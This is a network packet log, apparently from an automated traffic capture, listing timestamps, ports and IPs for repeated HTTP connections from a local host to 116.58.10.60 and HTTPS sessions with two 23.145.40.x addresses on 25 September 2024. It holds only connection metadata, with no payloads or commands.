                                                                      Sep 25, 2024 16:01:54.425427914 CEST8049730116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:54.425559998 CEST8049730116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:55.668787956 CEST8049730116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:55.668827057 CEST8049730116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:55.668994904 CEST4973080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:55.669234991 CEST4973080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:55.671477079 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:55.671547890 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:55.671643019 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:55.672035933 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:55.672055006 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:55.674132109 CEST8049730116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:56.319545031 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.319708109 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:56.329772949 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:56.329792976 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.330130100 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.337883949 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:56.383395910 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.538494110 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.538516998 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.538578987 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:56.538603067 CEST4434973123.145.40.164192.168.2.5
Sep 25, 2024 16:01:56.589565992 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.625019073 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.625044107 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.625176907 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.625700951 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.625720024 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.625762939 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.625785112 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.626422882 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.626508951 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.628056049 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.628133059 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.711734056 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.711834908 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.711843967 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.711877108 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.711930037 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.711942911 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.712822914 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.712899923 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.713253021 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.713330030 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.714108944 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.714189053 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.715015888 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.715101957 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.715136051 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.715225935 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.781508923 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.781672955 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.798583031 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.798641920 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.798702955 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.798724890 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.798741102 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.798774004 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.799240112 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.799336910 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.799781084 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.799894094 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.799962997 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.799962997 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.799973011 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.800092936 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.800666094 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.800811052 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.800952911 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.800952911 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.800961018 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.801142931 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.801580906 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.801664114 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.801677942 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.801774979 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.802514076 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.802617073 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.802622080 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.802644968 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.802686930 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.802706003 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.843295097 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.843446016 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.868166924 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.868299961 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.885292053 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.885349035 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.885401964 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.885411978 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.885436058 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.885487080 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.885612011 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.885804892 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.886023045 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.886096954 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.886120081 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.886274099 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.886624098 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.886719942 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.886938095 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.887025118 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.887053013 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.887125969 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.890285969 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.890368938 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.890425920 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.890499115 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.890767097 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.890818119 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.890834093 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.890841007 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.890887976 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.890887976 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.891108036 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.891230106 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.891535044 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.891710043 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.930202961 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.930351019 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.955024958 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.955197096 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.971975088 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.972095966 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.972117901 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.972188950 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.972229958 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.972358942 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.972394943 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.972462893 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.972528934 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.972681046 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.972697020 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.972707033 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.972759008 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.972759008 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.972822905 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.972918034 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.973046064 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.973125935 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.973202944 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.973283052 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.973323107 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.973432064 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.973440886 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.973459005 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.973529100 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.973599911 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.973614931 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.973614931 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.973639011 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:56.973660946 CEST | 49731 | 443 | 192.168.2.5 | 23.145.40.164
Sep 25, 2024 16:01:56.973666906 CEST | 443 | 49731 | 23.145.40.164 | 192.168.2.5
Sep 25, 2024 16:01:57.189412117 CEST | 49732 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:57.194350004 CEST | 80 | 49732 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:57.194452047 CEST | 49732 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:57.194613934 CEST | 49732 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:57.194637060 CEST | 49732 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:57.199404955 CEST | 80 | 49732 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:57.199536085 CEST | 80 | 49732 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:58.462407112 CEST | 80 | 49732 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:58.462481976 CEST | 80 | 49732 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:58.462541103 CEST | 49732 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:58.462683916 CEST | 49732 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:58.466084003 CEST | 49733 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:58.467457056 CEST | 80 | 49732 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:58.471036911 CEST | 80 | 49733 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:58.471144915 CEST | 49733 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:58.471280098 CEST | 49733 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:58.471318007 CEST | 49733 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:58.478075981 CEST | 80 | 49733 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:58.478087902 CEST | 80 | 49733 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:59.728923082 CEST | 80 | 49733 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:59.728986025 CEST | 80 | 49733 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:59.729147911 CEST | 49733 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:59.729372978 CEST | 49733 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:59.732570887 CEST | 49735 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:59.734184027 CEST | 80 | 49733 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:59.737420082 CEST | 80 | 49735 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:59.737492085 CEST | 49735 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:59.737637997 CEST | 49735 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:59.737658978 CEST | 49735 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:59.742433071 CEST | 80 | 49735 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:59.742516994 CEST | 80 | 49735 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:01.002402067 CEST | 80 | 49735 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:01.002497911 CEST | 80 | 49735 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:01.002562046 CEST | 49735 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:01.003802061 CEST | 49735 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:01.008774042 CEST | 80 | 49735 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:01.051676035 CEST | 49736 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:01.058191061 CEST | 80 | 49736 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:01.058329105 CEST | 49736 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:01.058787107 CEST | 49736 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:01.059075117 CEST | 49736 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:01.064486980 CEST | 80 | 49736 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:01.065558910 CEST | 80 | 49736 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:02.506156921 CEST | 80 | 49736 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:02.507786036 CEST | 80 | 49736 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:02.511353016 CEST | 49736 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:02.511409998 CEST | 49736 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:02.514549971 CEST | 49737 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:02.516330004 CEST | 80 | 49736 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:02.519522905 CEST | 80 | 49737 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:02.523319006 CEST | 49737 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:02.523468018 CEST | 49737 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:02.523485899 CEST | 49737 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:02.528295040 CEST | 80 | 49737 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:02.528538942 CEST | 80 | 49737 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:04.095367908 CEST | 80 | 49737 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:04.095578909 CEST | 80 | 49737 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:04.095673084 CEST | 49737 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:04.098129034 CEST | 49737 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:04.101264000 CEST | 49738 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:04.102936983 CEST | 80 | 49737 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:04.106034994 CEST | 80 | 49738 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:04.106129885 CEST | 49738 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:04.106247902 CEST | 49738 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:04.106264114 CEST | 49738 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:04.111059904 CEST | 80 | 49738 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:04.111069918 CEST | 80 | 49738 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:06.504560947 CEST | 80 | 49738 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:06.505426884 CEST | 80 | 49738 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:06.505503893 CEST | 49738 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:06.505557060 CEST | 49738 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:06.508286953 CEST | 49739 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:06.510571957 CEST | 80 | 49738 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:06.513189077 CEST | 80 | 49739 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:06.513273001 CEST | 49739 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:06.513477087 CEST | 49739 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:06.513477087 CEST | 49739 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:06.518263102 CEST | 80 | 49739 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:06.518306017 CEST | 80 | 49739 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:07.770028114 CEST | 80 | 49739 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:07.770047903 CEST | 80 | 49739 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:07.770117998 CEST | 49739 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:07.770293951 CEST | 49739 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:07.772984982 CEST | 49740 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:07.775053978 CEST | 80 | 49739 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:07.777805090 CEST | 80 | 49740 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:07.777879000 CEST | 49740 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:07.777985096 CEST | 49740 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:07.777998924 CEST | 49740 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:07.782973051 CEST | 80 | 49740 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:07.782988071 CEST | 80 | 49740 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:09.265044928 CEST | 80 | 49740 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:09.265058994 CEST | 80 | 49740 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:09.265137911 CEST | 80 | 49740 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:09.265192986 CEST | 49740 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:09.265211105 CEST | 49740 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:09.265326023 CEST | 49740 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:02:09.274643898 CEST | 80 | 49740 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:02:19.526936054 CEST | 49741 | 443 | 192.168.2.5 | 23.145.40.162
Sep 25, 2024 16:02:19.526977062 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:19.527180910 CEST | 49741 | 443 | 192.168.2.5 | 23.145.40.162
Sep 25, 2024 16:02:19.528192997 CEST | 49741 | 443 | 192.168.2.5 | 23.145.40.162
Sep 25, 2024 16:02:19.528208971 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.148782015 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.148936987 CEST | 49741 | 443 | 192.168.2.5 | 23.145.40.162
Sep 25, 2024 16:02:20.151043892 CEST | 49741 | 443 | 192.168.2.5 | 23.145.40.162
Sep 25, 2024 16:02:20.151057005 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.151364088 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.155854940 CEST | 49741 | 443 | 192.168.2.5 | 23.145.40.162
Sep 25, 2024 16:02:20.155888081 CEST | 49741 | 443 | 192.168.2.5 | 23.145.40.162
Sep 25, 2024 16:02:20.155956984 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.563478947 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.563507080 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.563590050 CEST | 49741 | 443 | 192.168.2.5 | 23.145.40.162
Sep 25, 2024 16:02:20.563601971 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.605181932 CEST | 49741 | 443 | 192.168.2.5 | 23.145.40.162
Sep 25, 2024 16:02:20.611789942 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.611807108 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.611942053 CEST | 49741 | 443 | 192.168.2.5 | 23.145.40.162
Sep 25, 2024 16:02:20.611960888 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.612742901 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.612878084 CEST | 49741 | 443 | 192.168.2.5 | 23.145.40.162
Sep 25, 2024 16:02:20.612886906 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.653908014 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.654031038 CEST | 49741 | 443 | 192.168.2.5 | 23.145.40.162
Sep 25, 2024 16:02:20.654052019 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.659966946 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.659977913 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.660048008 CEST | 49741 | 443 | 192.168.2.5 | 23.145.40.162
Sep 25, 2024 16:02:20.660058022 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
Sep 25, 2024 16:02:20.702136040 CEST | 443 | 49741 | 23.145.40.162 | 192.168.2.5
                                                                      Sep 25, 2024 16:02:20.702163935 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.702223063 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.702234030 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.702267885 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.703294039 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.703305006 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.703337908 CEST4434974123.145.40.162192.168.2.5
